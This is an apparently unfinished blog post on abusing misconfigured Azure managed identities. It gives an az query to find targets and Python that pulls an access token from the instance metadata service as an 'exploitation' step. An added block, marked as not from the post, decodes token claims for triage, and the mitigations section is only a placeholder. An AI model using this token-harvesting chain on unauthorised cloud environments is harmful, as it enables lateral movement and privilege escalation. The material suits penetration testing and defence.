This post will cover techniques for identifying and exploiting misconfigured managed identities in Azure to move laterally between resources.

Overview

This section will detail the attack chain from initial access to privilege escalation via managed identity abuse.

Identifying Targets

The query below lists only resources whose identity.type is exactly SystemAssigned; resources with a user-assigned identity report UserAssigned or "SystemAssigned, UserAssigned" and need a broader filter.

az resource list --query "[?identity.type=='SystemAssigned']" -o table

Exploitation

import requests

# Azure IMDS is link-local and only reachable from inside the VM.
IMDS_TOKEN_URL = "http://169.254.169.254/metadata/identity/oauth2/token"

def get_managed_identity_token(resource="https://management.azure.com/"):
    # The Metadata header is mandatory; IMDS rejects requests without it.
    params = {"api-version": "2018-02-01", "resource": resource}
    headers = {"Metadata": "true"}
    response = requests.get(IMDS_TOKEN_URL, params=params, headers=headers, timeout=5)
    # A 400 "Identity not found" response means no managed identity is assigned.
    response.raise_for_status()
    return response.json()["access_token"]
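Before doing anything with a token obtained this way (during a test or when triaging one found in an incident), decode its claims to see which principal, tenant and audience it is bound to and how long it remains valid. This is an added example, not code from the post; it reads the payload without verifying the signature and runs against a constructed, unsigned sample token rather than a live IMDS response.

```python
import base64
import json
import time


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_token(access_token: str) -> dict:
    """Return the claims a responder uses to scope what an access token can reach.

    The signature is NOT verified: verification needs the tenant's signing keys.
    """
    header_b64, payload_b64, _signature = access_token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(payload_b64))
    return {
        "alg": header.get("alg"),
        "audience": claims.get("aud"),        # resource the token is valid for
        "tenant": claims.get("tid"),
        "principal_oid": claims.get("oid"),   # service principal behind the identity
        "app_id": claims.get("appid"),
        "identity_resource": claims.get("xms_mirid"),  # ARM id of the MI, if present
        "expires_at": claims.get("exp"),
        "seconds_left": claims.get("exp", 0) - int(time.time()),
    }


def _make_sample_token() -> str:
    # Constructed, unsigned sample with the claim shapes seen on MI tokens.
    header = {"typ": "JWT", "alg": "none"}
    payload = {
        "aud": "https://management.azure.com/",
        "tid": "00000000-0000-0000-0000-000000000000",
        "oid": "11111111-1111-1111-1111-111111111111",
        "appid": "22222222-2222-2222-2222-222222222222",
        "xms_mirid": "/subscriptions/<subscription-id>/resourceGroups/rg-demo"
                     "/providers/Microsoft.Compute/virtualMachines/vm-demo",
        "iat": 1700000000,
        "exp": 1700086400,
    }
    enc = lambda o: base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
    return f"{enc(header)}.{enc(payload)}."


SAMPLE_TOKEN = _make_sample_token()

if __name__ == "__main__":
    print(json.dumps(inspect_token(SAMPLE_TOKEN), indent=2))
```

A negative seconds_left on a token recovered from a host means it has already expired and cannot be replayed; a large remaining window is what makes scoping the identity's role assignments urgent.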

Mitigations

Details on how to properly scope managed identity permissions and detect abuse coming soon.